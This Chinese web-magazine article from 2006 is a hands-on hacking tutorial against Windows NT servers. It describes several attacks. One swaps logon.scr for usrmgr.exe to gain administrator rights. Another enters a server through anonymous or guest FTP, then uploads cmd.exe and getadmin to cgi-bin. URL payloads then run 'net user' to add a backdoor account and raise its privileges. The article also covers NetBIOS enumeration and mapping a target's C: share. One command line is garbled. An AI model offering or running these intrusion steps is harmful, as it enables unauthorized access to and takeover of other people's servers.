Memail首页 订阅杂志 广告合作 联系我们
 

看来Administrastor账户真的不安全


2006年07月15日 22:53  网页教学网


如果你有普通用户帐号,有个一个很简单的方法获取NT Administrator帐号:



先把c:\winnt\system32下的logon.scr改名为logon.old备份



然后把usrmgr.exe改名为logon.scr



然后重新启动



logon.scr是启动时加载的程序,重新启动后,不会出现以往的登陆密码输入界面,而是用户管理器。

这时他就有权限把自己加到Administrator组



不要忘记把文件名改回来啊!


之二:



下面的技术适用于不重视NT网络安全的网站,



一些 http的技术也可以供较高级的人员参考



进入NT网络可以采取下面的步骤:



因为NT的IIS server的ftp一般都是允许anonymous匿名帐号进入的,有些anonymous的帐号还有upload权限,我们就要攻击这类站点。因为如果不允许匿名帐号,就可能造成明文密码在网上传输。用tcpspy的工具可以截获这些密码。现在不谈这些比较高级的技术。



正因为允许匿名帐号ftp登陆的设定,也给我们带来了突破NT server的机会。我们用ftp登陆一个NT server,比如:www.xxx.com(示例名):



ftp www.xxx.com



Connected to www.xxx.com


ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下,必然会有一个IUSER_ntsvr2的用户帐号,属于Domain user组,这个帐号我们以后要用来获取Administrator的权限。



User (www.xxx.comnone)):anonymous


Password: 输入 guest@ 或者guest


对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置密码。那么guest帐号就是一个可用的正确的用户帐号,虽然只属于Domain guest组。



在这种情况下我们就可以进NT server的ftp了。



进去以后,看看目录列表,试试 cd /c 或wwwroot等关键目录,如果运气好,改变目录成功,这时你就有了80%的把握。



现在,开始查找cgi-bin目录(或者scripts目录),进去以后,



把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin



然后输入:http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_SATURN



大约十多秒后屏幕显示:



CGI Error



这时有90%的可能是:你已经把IUSER_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员。



下面可以add user:



http://www.xxx.com/cgi-bin/cmd.exe?/c c:\winnt\system32\net.exe user china news /add



这样就创建了一个叫china用户,密码是news,然后:



http://www.xxx.com/cgi-bin/getadmin.exe?china


或者



http://www.xxx.com/scripts/tools/getadmin.exe?china


你再用china的帐号登陆,就可以有最大的权限了,也可以用上面的cmd.exe的方法直接修改如果没有cmd.exe,也可以自己传一个上去到scripts/tools或者cgi-bin目录。


之三:


用NT的Netbios技术扫描


nbtstat -a http://www.xxx.com/


或者


nbtstat -A http://www.xxx.com/


这样可以得到其域的共享资源名称


net view file://www.xxx.com/


可以获得其机器的共享资源名称,如果有c盘


net use f: file://www.xxx.com/c


可以用f:映射其c盘


net use $">\111.111.111.111\ipc$Content$nbsp;"quot;"quot; /user:"quot;"quot;


之四: Unix下移植过来的工具:


Windows95"amp;98的用户可以用这个tcp/ip工具去抓tcp/ip连接中的包:


WinDump95.exe 使用前还要下载这个库 Packet95.exe


WindowsNT用户的版本


WinDump.exe PacketNT.exe

推荐】【打印】【  】【关闭窗口

投资快讯: 休闲空间:
 周末趣图集(07/14)  (07-14)
 [组图]感受优雅 奢华卫浴器皿  (07-14)
 小窍门:怎样挑西瓜  (07-14)
 女人养宠物的心理分析  (07-14)
 [图文]大自然的超级杰作,人类从未  (07-14)
影视速弟: 音乐天堂:
 组图:大S唤仔仔昵称肉麻 两人上海  (07-13)
 《迈阿密风云》被定限制级 火辣剧  (07-13)
 张柏芝评章子怡找“裸替”太造作   (07-13)
 舒淇林志玲眼光一致 拍写真同款裙  (07-13)
 张艺谋巩俐十年再聚大银幕 当梦想  (07-12)
 Rain古天乐压轴登场 中韩型男惺惺  (07-13)
 郑秀文无故推工作 坚决不露脸行为  (07-13)
 组图:庾澄庆化黑眼圈烟熏妆 年轻  (07-13)
 组图:张靓颖赴美录唱片 热情凉粉  (07-13)
 组图:罗志祥忙里偷闲吃料理 路人  (07-13)
软件快报: 硬件资讯:
 讲述电信禁止路由上网的最佳破解方  (07-15)
 Windows虚拟内存问题详解  (07-15)
 低配玩家有福 Vista将不再惨不忍睹  (07-15)
 让你的C盘快起来 揪出占据硬盘的凶  (07-15)
 看来Administrastor账户真的不安全  (07-15)
 帝国反击战:Conroe详细评测集锦  (07-14)
 日立设计新“硬盘”:DRAM+NAND  (07-14)
 指环/腕带设计 Nokia Icon造型曝  (07-14)
 Dell超频扣肉+SLI系统披露  (07-14)
 Conroe明天凌晨1点正式宣布并解密  (07-14)
想成为高手,靠自己摸索可远远不够。这里有众多的高手,愿把他们的经验与你交流。
发行周期:周一
发行记录:查看全部记录
 订阅更多的杂志
推荐:图片搜索

搜索16亿张互联网图片






·Google Suggest十大妙用
·微软新软件让旧PC也能享用XP
·微软WLM官方精彩壁纸+屏幕保护
·微软Live桌面软件新名称公布
·Google Web Accelerator 0.2.66.84
·微软推免费文件夹加密软件
·Office漏洞泛滥 PowerPoint也陷落
·下载:微软恶意软件清除工具新版
·IE7 Beta 3支持更多语言
·Firefox 2.0官方Vista风格主题
CopyRight© 2003 Memail.net, All Rights Reserved. 网站地图 隐私声明